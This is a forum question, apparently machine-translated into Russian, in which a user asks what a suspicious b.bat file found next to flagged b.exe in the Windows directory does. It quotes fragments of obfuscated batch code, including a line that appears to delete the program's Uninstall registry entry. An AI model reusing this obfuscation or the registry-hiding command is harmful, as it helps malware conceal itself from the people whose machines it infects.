Я проводил проверку на наличие вирусов HitmanPro, и она обнаружила b.exe , которая находилась в моем каталоге windows. Был еще один файл, b.bat, предположительно связанный с b.exe, в котором есть очень странный код, который я никогда не видел. Что делает летучая мышь?
она запускается с настройками странных параметров.
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
Затем использует их для создания длинного списка странных команд, вот фрагмент этого:
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
Далее следует настройка и выполнение более странных вещей:
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32
Вот Pastebin полного кода летучей мыши
Какого черта эта вещь делать?!?!